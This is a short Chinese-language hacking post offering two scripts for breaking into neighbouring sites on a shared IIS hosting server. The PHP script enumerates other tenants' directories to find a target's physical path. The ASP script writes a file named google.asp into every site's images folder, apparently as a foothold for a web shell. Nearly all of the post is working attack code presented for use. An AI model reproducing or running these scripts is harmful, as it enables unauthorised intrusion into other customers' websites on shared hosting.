如何找到一个php页面的目录,php一个找二层目录的小东东

碰到个虚拟主机,iis7.0.里边有上万个站,只有脚本权限,没命令行权限,但是可以跨目录写文件.如果能得到目标站的物理目录,能立马搞定.但是想尽一切办法,也没找到物理路径.所以只有用脚本找了.手工找会累死的.一个php是找的,一个asp是写的

php版

set_time_limit(0);

$path = 'D:/Hosting';

$somefile = $_GET['key'];

$logfile = 'D:/Hosting/6668835/html/images/ennumdir.txt';

if (!isset($_SERVER['PHP_AUTH_USER'])) {

header('WWW-Authenticate: Basic realm="My Realm"');

header('HTTP/1.0 401 Unauthorized');

echo 'Text to send if user hits Cancel button';

exit;

} else {

if(is_dir($path) && is_readable($path))

{

$path2 = '';

$handle = opendir($path);

while(false !== ($filename = readdir($handle)))

{

if($filename{0} != $_GET['dir'])

{

continue;

}

/*

if($filename{1} != $_GET['two'])

{

continue;

}

*/

//$path2 = $path.'/'.$filename.'/html';

$path2 = $path.'/'.$filename;

if(is_dir($path2) && is_readable($path2))

{

@$handle2 = opendir($path2);

while(false !== ($filename2 = readdir($handle2)))

{

if($filename2 == $somefile)

{

//echo'[+]Found !'.$filename2."\n";

file_put_contents($logfile,'[+]Found !'.$path2.'/'.$filename2."\n",FILE_APPEND);

}

}

@closedir($handle2);

}

}

file_put_contents($logfile,'[*]LAST '.$path2."\n",FILE_APPEND);

closedir($handle);

}

}

asp版

Server.ScriptTimeout=500000000

key = Trim(Request.QueryString("key"))

msg=" "

Set FSO=Server.CreateObject("Scripting.FileSystemObject")

Set ServerFolder=FSO.GetFolder("C:\intel")

Set ServerFolderList=ServerFolder.subfolders

For Each ServerFileEvery IN ServerFolderList

' Response.write ServerFileEvery&""

If LCase(Left(ServerFileEvery.name, 1)) = LCase(key) Then

Set sServerFolder=FSO.GetFolder(ServerFileEvery)

Set sServerFolderList=sServerFolder.subfolders

For Each sServerFileEvery IN sServerFolderList

If LCase(sServerFileEvery.name) = "images" Then

StreamSaveToFile sServerFileEvery & "\google.asp", msg, "UTF-8"

End If

Next

End If

Next

Function StreamSaveToFile(sPath, sContent, sCharSet)

Dim oStream

If(InStr(sPath, ":") <= 0)Then

sPath = Replace(sPath, ",", "，")

sPath = Server.MapPath(sPath)

sPath = Replace(sPath, "，", ",")

End If

Set oStream = Server.CreateObject("Adodb.Stream")

With oStream

.Type = 2

.Mode = 3

.Open

.Charset = sCharSet

.WriteText sContent

.SaveToFile sPath, 2

.Close

End With

Set oStream = Nothing

End Function

%>